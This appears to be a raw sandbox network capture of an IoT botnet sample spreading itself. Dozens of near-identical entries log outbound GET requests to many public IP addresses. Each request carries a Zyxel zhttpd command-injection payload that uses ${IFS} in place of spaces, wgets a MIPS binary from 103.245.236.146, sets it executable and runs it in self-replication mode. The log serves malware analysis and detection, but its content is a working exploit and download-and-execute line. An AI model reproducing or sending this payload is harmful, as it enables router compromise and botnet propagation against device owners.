                                                Jan 29, 2024 07:07:41.170325994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2524192.168.2.2341146167.220.85.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170358896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2525192.168.2.2345074115.129.31.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170408010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2526192.168.2.235745671.144.100.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170455933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2527192.168.2.2342314209.173.198.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170488119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2528192.168.2.2334236120.85.9.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170521975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2529192.168.2.235942870.226.64.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170563936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2530192.168.2.234439685.38.243.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170604944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2531192.168.2.2342446218.19.46.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170644999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2532192.168.2.2353190138.243.92.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170700073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2533192.168.2.2349992146.85.152.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170731068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2534192.168.2.234409435.89.57.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170775890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2535192.168.2.235091041.213.12.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170820951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2536192.168.2.233549052.92.174.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170870066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2537192.168.2.233382820.53.184.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170902967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2538192.168.2.23351901.16.240.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170950890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2539192.168.2.235940858.143.255.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.170975924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2540192.168.2.2357380178.78.25.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171000004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2541192.168.2.2341760123.180.160.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171036005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2542192.168.2.2340948100.63.142.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171062946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2543192.168.2.2359134205.70.230.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171108007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2544192.168.2.2334726124.68.101.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171161890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2545192.168.2.2358100205.57.197.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171190977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2546192.168.2.2352518150.41.119.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171224117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2547192.168.2.2341768158.59.154.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171281099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2548192.168.2.23380101.138.198.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171309948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2549192.168.2.2347286114.198.209.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171351910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2550192.168.2.2340788112.51.218.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171380043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2551192.168.2.2349718204.16.92.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171436071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2552192.168.2.234908293.66.241.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171489954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2553192.168.2.234536277.63.86.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171534061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2554192.168.2.2343502112.131.240.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171562910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2555192.168.2.235695890.166.93.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171591043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2556192.168.2.235703839.173.141.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171650887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2557192.168.2.2353066142.207.25.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171694994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2558192.168.2.234041247.20.157.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171726942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2559192.168.2.233484868.230.246.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171773911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2560192.168.2.233840457.79.171.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171822071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2561192.168.2.2345674155.224.196.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171847105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2562192.168.2.2340562199.123.3.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171890974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2563192.168.2.2333286157.46.81.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171927929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2564192.168.2.2356694209.100.13.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.171972990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2565192.168.2.234150899.213.196.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172015905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2566192.168.2.2354552153.61.237.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172054052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2567192.168.2.2345042128.114.67.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172096014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2568192.168.2.2357554157.23.133.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172115088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2569192.168.2.23453025.22.105.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172142982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2570192.168.2.234154447.51.86.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172208071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2571192.168.2.2344232143.52.83.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172245026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2572192.168.2.233806476.74.9.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172301054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2573192.168.2.2358990128.202.243.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172346115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2574192.168.2.23519884.83.252.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172375917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2575192.168.2.235728819.106.183.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172396898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2576192.168.2.2340056144.1.122.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172457933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2577192.168.2.235800280.25.123.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172507048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2578192.168.2.234103452.200.50.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172534943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2579192.168.2.2353964210.15.197.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172580957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2580192.168.2.2346532134.84.162.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172614098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2581192.168.2.235019086.94.187.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172672987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2582192.168.2.233610831.110.15.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172704935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2583192.168.2.2334238197.34.145.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172743082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2584192.168.2.2343696155.83.200.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172775984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2585192.168.2.2341330153.20.222.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172823906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2586192.168.2.2360138131.119.150.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172848940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2587192.168.2.233787637.98.120.75443
                                                TimestampBytes transferredDirectionData
